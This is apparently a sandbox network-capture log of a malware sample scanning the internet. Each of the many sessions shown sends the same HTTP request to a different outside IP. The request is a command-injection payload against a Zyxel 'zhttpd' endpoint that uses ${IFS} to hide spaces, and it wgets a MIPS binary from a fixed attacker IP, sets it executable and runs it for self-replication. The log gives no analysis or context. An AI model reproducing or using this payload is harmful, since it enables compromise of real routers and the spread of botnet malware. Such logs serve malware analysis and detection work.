                                          Jan 14, 2024 15:46:34.400419950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8804192.168.2.2354364161.253.119.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400449038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8805192.168.2.2355064175.9.156.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400461912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8806192.168.2.2357078193.77.201.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400509119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8807192.168.2.2346876179.199.160.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400547981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8808192.168.2.233943623.201.145.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400559902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8809192.168.2.234534289.254.108.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400624990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8810192.168.2.234915432.87.137.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400645018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8811192.168.2.2355156203.62.222.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400675058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8812192.168.2.2334182150.68.118.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400702000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8813192.168.2.2355984177.111.17.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400760889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8814192.168.2.2347292117.76.184.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400789976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8815192.168.2.2341300108.37.192.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400821924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8816192.168.2.234716691.53.70.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400861979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8817192.168.2.235425666.65.46.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400927067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8818192.168.2.2353002212.2.137.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400952101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8819192.168.2.2341042185.143.28.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.400985956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8820192.168.2.234862686.124.73.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401014090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8821192.168.2.2338686203.28.251.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401086092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8822192.168.2.23598902.82.135.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401091099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8823192.168.2.2345458166.197.87.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401129007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8824192.168.2.235747413.34.126.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401182890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8825192.168.2.23393041.50.7.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401223898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8826192.168.2.2358998190.235.203.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401232958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8827192.168.2.2358692159.166.254.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401288033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8828192.168.2.2338296222.165.59.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401345015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8829192.168.2.235729877.179.251.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401365995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8830192.168.2.2333980171.60.232.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401401997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8831192.168.2.235072688.177.217.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401452065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8832192.168.2.2355770134.210.133.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401490927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8833192.168.2.2356312192.118.246.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401523113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8834192.168.2.235012461.124.94.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401607990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8835192.168.2.2360880148.48.220.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401633024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8836192.168.2.2334072135.207.222.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401670933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8837192.168.2.2339238209.140.218.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401700974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8838192.168.2.2337184115.137.9.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401746988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8839192.168.2.2344664165.156.139.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401798010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8840192.168.2.2347278106.242.90.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401843071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8841192.168.2.2353362146.55.144.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401865005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8842192.168.2.2345648105.246.178.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401899099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8843192.168.2.234113075.123.87.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401942015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8844192.168.2.235004866.188.148.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.401992083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8845192.168.2.2340878175.253.78.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402015924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8846192.168.2.235550076.123.106.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402072906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8847192.168.2.2344002204.68.232.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402101994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8848192.168.2.2337088124.229.241.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402163982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8849192.168.2.2334604168.9.40.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402215004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8850192.168.2.2336212210.34.57.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402230978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8851192.168.2.2342756165.142.209.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402302027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8852192.168.2.235130019.246.247.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402353048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8853192.168.2.2349650197.129.30.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402380943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8854192.168.2.235763094.223.174.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402419090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8855192.168.2.2355246100.5.216.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402447939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8856192.168.2.234865685.75.89.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402496099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8857192.168.2.2350122159.185.133.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402533054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8858192.168.2.2334708205.88.9.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402585983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8859192.168.2.2347642102.153.151.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402631998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8860192.168.2.2336980115.140.199.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402671099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8861192.168.2.234737443.254.203.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402728081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8862192.168.2.2342094158.193.14.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402754068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8863192.168.2.2349600123.101.43.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402797937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8864192.168.2.233624497.250.162.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402810097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8865192.168.2.2347872178.31.220.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:34.402852058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8866192.168.2.2353304187.140.13.39443
                                          TimestampBytes transferredDirectionData
